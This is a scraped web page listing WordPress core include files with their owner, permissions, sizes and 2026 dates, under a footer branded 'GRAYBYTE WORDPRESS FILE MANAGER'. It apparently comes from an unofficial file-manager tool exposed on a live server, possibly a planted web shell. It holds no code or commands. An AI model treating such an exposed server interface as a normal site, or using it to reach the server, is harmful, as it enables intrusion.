www-data / www-data
0664
plugin.php
35.77 KB
June 04 2026 19:19:38
www-data / www-data
0664
post-formats.php
6.904 KB
May 27 2026 03:19:33
www-data / www-data
0664
post-template.php
67.007 KB
May 27 2026 03:19:33
www-data / www-data
0664
post-thumbnail-template.php
10.624 KB
May 27 2026 03:19:33
www-data / www-data
0664
post.php
289.575 KB
June 04 2026 19:19:37
www-data / www-data
0664
query.php
36.226 KB
June 04 2026 19:19:37
www-data / www-data
0664
registration-functions.php
0.195 KB
May 27 2026 03:19:33
www-data / www-data
0664
registration.php
0.195 KB
May 27 2026 03:19:33
www-data / www-data
0664
rest-api.php
98.517 KB
June 04 2026 19:19:37
www-data / www-data
0664
revision.php
29.992 KB
June 04 2026 19:19:37
www-data / www-data
0664
rewrite.php
19.005 KB
May 27 2026 03:19:33
www-data / www-data
0664
robots-template.php
5.063 KB
May 27 2026 03:19:33
www-data / www-data
0664
rss-functions.php
0.249 KB
May 27 2026 03:19:33
www-data / www-data
0664
rss.php
22.659 KB
May 27 2026 03:19:33
www-data / www-data
0664
script-loader.php
159.303 KB
May 27 2026 03:19:33
www-data / www-data
0664
script-modules.php
11.663 KB
May 27 2026 03:19:33
www-data / www-data
0664
session.php
0.252 KB
May 27 2026 03:19:33
www-data / www-data
0664
shortcodes.php
23.471 KB
May 27 2026 03:19:33
www-data / www-data
0664
sitemaps.php
3.162 KB
June 04 2026 19:19:37
www-data / www-data
0664
speculative-loading.php
8.398 KB
May 27 2026 03:19:33
www-data / www-data
0664
spl-autoload-compat.php
0.431 KB
May 27 2026 03:19:33
www-data / www-data
0664
style-engine.php
7.386 KB
June 04 2026 19:19:37
www-data / www-data
0664
taxonomy.php
172.992 KB
June 04 2026 19:19:37
www-data / www-data
0664
template-canvas.php
0.531 KB
May 27 2026 03:19:33
www-data / www-data
0664
template-loader.php
4.291 KB
June 04 2026 19:19:38
www-data / www-data
0664
template.php
35.961 KB
May 27 2026 03:19:33
www-data / www-data
0664
theme-i18n.json
1.848 KB
May 27 2026 03:19:33
www-data / www-data
0664
theme-previews.php
2.819 KB
May 27 2026 03:19:33
www-data / www-data
0664
theme-templates.php
3.965 KB
May 27 2026 03:19:33
www-data / www-data
0664
theme.json
8.825 KB
May 27 2026 03:19:33
www-data / www-data
0664
theme.php
131.476 KB
June 04 2026 19:19:37
www-data / www-data
0664
update.php
37.379 KB
June 04 2026 19:19:37
www-data / www-data
0664
user.php
174.633 KB
June 04 2026 19:19:37
www-data / www-data
0664
utf8.php
7.09 KB
May 27 2026 03:19:33
www-data / www-data
0664
vars.php
6.452 KB
June 04 2026 19:19:37
www-data / www-data
0664
version.php
1.075 KB
June 04 2026 19:19:37
www-data / www-data
0664
view-transitions.php
0.588 KB
May 27 2026 03:19:33
www-data / www-data
0664
widgets.php
69.168 KB
June 04 2026 19:19:37
www-data / www-data
0664
wp-db.php
0.435 KB
May 27 2026 03:19:33
www-data / www-data
0664
wp-diff.php
0.78 KB
May 27 2026 03:19:33
www-data / www-data
0664

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF